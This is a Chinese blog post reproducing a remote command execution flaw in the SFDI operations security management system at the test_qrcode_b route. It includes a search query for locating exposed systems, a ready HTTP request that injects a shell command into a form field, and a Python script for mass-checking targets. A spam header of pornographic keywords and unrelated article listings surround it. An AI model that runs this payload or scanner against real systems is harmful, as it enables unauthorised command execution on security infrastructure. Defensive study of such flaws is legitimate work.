国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

思福迪 運(yùn)維安全管理系統(tǒng) test_qrcode_b 遠(yuǎn)程命令執(zhí)行漏洞

2年前作者:安全攻防趙小龍分類:Toy博客閱讀(19)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了思福迪 運(yùn)維安全管理系統(tǒng) test_qrcode_b 遠(yuǎn)程命令執(zhí)行漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

免責(zé)聲明:請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章作者無關(guān)。該文章僅供學(xué)習(xí)用途使用。

一、漏洞描述

思福迪運(yùn)維安全管理系統(tǒng)是思福迪開發(fā)的一款運(yùn)維安全管理堡壘機(jī)。思福迪運(yùn)維安全管理系統(tǒng) test_qrcode_b 路由存在命令執(zhí)行漏洞。

二、漏洞影響

思福迪 運(yùn)維安全管理系統(tǒng)

三、網(wǎng)絡(luò)測(cè)繪

app=“思福迪-LOGBASE”

四、漏洞復(fù)現(xiàn)

登陸頁面

思福迪漏洞,網(wǎng)絡(luò)安全漏洞復(fù)現(xiàn),運(yùn)維,安全,python,漏洞復(fù)現(xiàn)

1.手動(dòng)復(fù)現(xiàn)

驗(yàn)證POC

POST /bhost/test_qrcode_b HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Content-Length: 23
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://xxx.xxx.xxx.xxx
Accept-Encoding: gzip

z1=1&z2="|id;"&z3=bhost

burp截圖

思福迪漏洞,網(wǎng)絡(luò)安全漏洞復(fù)現(xiàn),運(yùn)維,安全,python,漏洞復(fù)現(xiàn)

2.自動(dòng)化復(fù)現(xiàn)

小龍POC檢測(cè)腳本正式開源,請(qǐng)各路大神完善和批評(píng)

小龍POCexe傳送門: 小龍POC工具

小龍POC開源傳送門: 小龍POC工具

3.python源代碼

# SFDI_Security_Management_System_test_qrcode_b_Command_Vuln_Scan.py

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import Timeout

def Scan_SFDI_Security_Management_System_test_qrcode_b_Command_Vuln(url, proxies, headers, append_to_output):

    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    if url.endswith("/"):
        path = "bhost/test_qrcode_b"
    else:
        path = "/bhost/test_qrcode_b"

    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
        "Content-Length": "23",
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": url,
        "Accept-Encoding": "gzip",
    }

    encodetext = url + path
    data='''z1=1&z2="|id;"&z3=bhost'''
    append_to_output("===================================================================", "green")
    append_to_output(f"掃描目標(biāo): {url}", "yellow")
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        req1 = requests.post(encodetext, data=data, headers=headers, verify=False, timeout=20, proxies=proxies)

        if req1.status_code == 200 and 'uid' in req1.text:
            append_to_output(f"[+] {url} 存在思福迪 運(yùn)維安全管理系統(tǒng) test_qrcode_b 遠(yuǎn)程命令執(zhí)行漏洞!?。?!", "red")
        else:
            append_to_output(f"[-] {url} 不存在思福迪 運(yùn)維安全管理系統(tǒng) test_qrcode_b 遠(yuǎn)程命令執(zhí)行漏洞", "green")
    except Timeout:
        append_to_output(f"[!] 請(qǐng)求超時(shí),跳過URL: {url}", "yellow")
    except Exception as e:
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            append_to_output(f"[-] {url} 證書校驗(yàn)錯(cuò)誤或者證書被拒絕", "yellow")
        else:
            append_to_output(str(e), "yellow")

思福迪漏洞,網(wǎng)絡(luò)安全漏洞復(fù)現(xiàn),運(yùn)維,安全,python,漏洞復(fù)現(xiàn)文章來源地址http://www.zghlxwxcb.cn/news/detail-765926.html

到了這里,關(guān)于思福迪 運(yùn)維安全管理系統(tǒng) test_qrcode_b 遠(yuǎn)程命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【運(yùn)維工程師學(xué)習(xí)二】OS系統(tǒng)管理

    【運(yùn)維工程師學(xué)習(xí)二】OS系統(tǒng)管理

    操作系統(tǒng)管理著所有的硬件資源,負(fù)責(zé)響應(yīng)各個(gè)應(yīng)用的資源請(qǐng)求。應(yīng)用還沒有運(yùn)行的時(shí)候就只是一堆各種各樣的文件( 二進(jìn)制文件、文本文件 等等),運(yùn)行的時(shí)候,相對(duì)系統(tǒng)而言就是進(jìn)程。比如你啟動(dòng) apache (linux下知名的web服務(wù)端),在系統(tǒng)中就啟動(dòng)了一個(gè)(或多個(gè),假如

    2024年02月11日
    瀏覽(21)
  • 云計(jì)算Linux運(yùn)維——Linux系統(tǒng)管理——網(wǎng)絡(luò)參數(shù)配置

    云計(jì)算Linux運(yùn)維——Linux系統(tǒng)管理——網(wǎng)絡(luò)參數(shù)配置

    點(diǎn)關(guān)注不迷路 目錄 1網(wǎng)絡(luò)參數(shù)配置 一、網(wǎng)絡(luò)參數(shù) 1、主機(jī)名 2、查看網(wǎng)卡IP地址 3、查看網(wǎng)關(guān) 4、查看DNS服務(wù)器地址 二、配置網(wǎng)卡 1、修改網(wǎng)卡配置文件 2、nmcli命令 3、nmcli配置網(wǎng)卡 3)重新加載配置 三、VMware網(wǎng)絡(luò)工作模式 1、虛擬網(wǎng)絡(luò)、虛擬網(wǎng)卡 2、虛擬網(wǎng)絡(luò)工作模式 2雙網(wǎng)卡綁

    2024年02月04日
    瀏覽(27)
  • 圖撲 HT for Web 手機(jī)端運(yùn)維管理系統(tǒng)

    圖撲 HT for Web 手機(jī)端運(yùn)維管理系統(tǒng)

    隨著信息技術(shù)的快速發(fā)展,網(wǎng)絡(luò)技術(shù)的應(yīng)用涉及到人們生活的方方面面。其中,手機(jī)運(yùn)維管理系統(tǒng)可提供數(shù)字化、智能化的方式,幫助企業(yè)和組織管理監(jiān)控企業(yè)的 IT 環(huán)境,提高運(yùn)維效率、降低維護(hù)成本、增強(qiáng)安全性、提升服務(wù)質(zhì)量,并支持企業(yè)實(shí)現(xiàn)數(shù)字化轉(zhuǎn)型,滿足客戶需求

    2024年02月06日
    瀏覽(21)
  • 手機(jī)端運(yùn)維管理系統(tǒng)——圖撲 HT for Web

    手機(jī)端運(yùn)維管理系統(tǒng)——圖撲 HT for Web

    隨著信息技術(shù)的快速發(fā)展,網(wǎng)絡(luò)技術(shù)的應(yīng)用涉及到人們生活的方方面面。其中,手機(jī)運(yùn)維管理系統(tǒng)可提供數(shù)字化、智能化的方式,幫助企業(yè)和組織管理監(jiān)控企業(yè)的 IT 環(huán)境,提高運(yùn)維效率、降低維護(hù)成本、增強(qiáng)安全性、提升服務(wù)質(zhì)量,并支持企業(yè)實(shí)現(xiàn)數(shù)字化轉(zhuǎn)型,滿足客戶需求

    2024年02月05日
    瀏覽(18)

  • 多監(jiān)控系統(tǒng)產(chǎn)生的告警如何高效管理 - 運(yùn)維事件中心

    隨著互聯(lián)網(wǎng)服務(wù)深入千行百業(yè),數(shù)字化成為企業(yè)和機(jī)構(gòu)為用戶提供服務(wù)的重要形式。在企業(yè)的IT基礎(chǔ)架構(gòu)趨于復(fù)雜化的過程中,運(yùn)維管理工作的技術(shù)性也有了更高的要求。如果針對(duì)相關(guān)的故障,企業(yè)無法做到及時(shí)的發(fā)現(xiàn)和響應(yīng),將會(huì)延長上層業(yè)務(wù)中斷的事件,缺位的運(yùn)維將會(huì)

    2024年01月16日
    瀏覽(37)
  • 華為1+X認(rèn)證網(wǎng)絡(luò)系統(tǒng)管理與運(yùn)維中級(jí)實(shí)驗(yàn)

    華為1+X認(rèn)證網(wǎng)絡(luò)系統(tǒng)管理與運(yùn)維中級(jí)實(shí)驗(yàn)

    實(shí)驗(yàn)拓?fù)?? ? 配置參數(shù) ? ? ? ? ? ? 任務(wù)1:設(shè)備命名 為了方便后期維護(hù)和故障定位及網(wǎng)絡(luò)的規(guī)范性,需要對(duì)網(wǎng)絡(luò)設(shè)備進(jìn)行規(guī)范化命名。 請(qǐng)根據(jù)Figure 3-1實(shí)驗(yàn)考試拓?fù)鋵?duì)設(shè)備進(jìn)行命名。 命名規(guī)則為:城市-設(shè)備的設(shè)置地點(diǎn)-設(shè)備的功能屬性和序號(hào)-設(shè)備型號(hào)。 例如::處于

    2024年02月05日
    瀏覽(28)
  • Acrel-3000水電站廠用電管理系統(tǒng)實(shí)現(xiàn)電站的發(fā)、用電監(jiān)控、設(shè)備管理和運(yùn)維管理-安科瑞黃安南

    Acrel-3000水電站廠用電管理系統(tǒng)實(shí)現(xiàn)電站的發(fā)、用電監(jiān)控、設(shè)備管理和運(yùn)維管理-安科瑞黃安南

    NB/T 10861-2021《水力發(fā)電廠測(cè)量裝置配置設(shè)計(jì)規(guī)范》對(duì)水電廠的測(cè)量裝置配置做了詳細(xì)要求和指導(dǎo)。測(cè)量裝置是水力發(fā)電廠運(yùn)行監(jiān)測(cè)的重要環(huán)節(jié),水電廠的測(cè)量主要分為電氣量測(cè)量和非電量測(cè)量。電氣測(cè)量指使用電的方式對(duì)電氣實(shí)時(shí)參數(shù)進(jìn)行測(cè)量,包括電流、電壓、頻率、功率

    2024年02月07日
    瀏覽(26)
  • 基于SaaS模式的Java基層衛(wèi)生健康云HIS系統(tǒng)源碼【運(yùn)維管理+運(yùn)營管理+綜合監(jiān)管】

    基于SaaS模式的Java基層衛(wèi)生健康云HIS系統(tǒng)源碼【運(yùn)維管理+運(yùn)營管理+綜合監(jiān)管】

    模板分為兩種: 病歷模板和報(bào)表模板。模板管理是運(yùn)營管理的核心組成部分,是基層衛(wèi)生健康云中各醫(yī)療機(jī)構(gòu)定制電子病歷和報(bào)表的地方,各醫(yī)療機(jī)構(gòu)可根據(jù)自身特點(diǎn)特色定制電子病歷和報(bào)表,制作的電子病歷及報(bào)表可直接在業(yè)務(wù)系統(tǒng)中使用。 病歷模板和報(bào)表模板的制作方

    2024年02月16日
    瀏覽(34)
  • 銀河麒麟桌面操作系統(tǒng)V10-常見運(yùn)維問題類別:外設(shè)管理 03

    銀河麒麟桌面操作系統(tǒng)V10-常見運(yùn)維問題類別:外設(shè)管理 03

    目錄 問題類別 3:外設(shè)管理 3.1 添加網(wǎng)絡(luò)共享打印機(jī)后,無法進(jìn)行打印 【適用版本】 【問題現(xiàn)象】 【解決方案】 方法 1:圖形軟件關(guān)閉防火墻。 ?方法 2:使用命令關(guān)閉防火墻。 3.2 系統(tǒng)設(shè)置共享打印機(jī)問題 【適用版本】 【問題現(xiàn)象】 【解決方案】 3.3 系統(tǒng)共享打印認(rèn)證問

    2024年02月09日
    瀏覽(29)
  • Linux系統(tǒng)中實(shí)現(xiàn)便捷運(yùn)維管理和遠(yuǎn)程訪問的1Panel部署方法解析

    Linux系統(tǒng)中實(shí)現(xiàn)便捷運(yùn)維管理和遠(yuǎn)程訪問的1Panel部署方法解析

    1Panel 是一個(gè)現(xiàn)代化、開源的 Linux 服務(wù)器運(yùn)維管理面板。高效管理,通過 Web 端輕松管理 Linux 服務(wù)器,包括主機(jī)監(jiān)控、文件管理、數(shù)據(jù)庫管理、容器管理等下面我們介紹在Linux 本地安裝1Panel 并結(jié)合cpolar 內(nèi)網(wǎng)穿透工具實(shí)現(xiàn)遠(yuǎn)程訪問1Panel 管理界面## 1. Linux 安裝1Panel執(zhí)行如下命令一

    2024年02月09日
    瀏覽(26)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包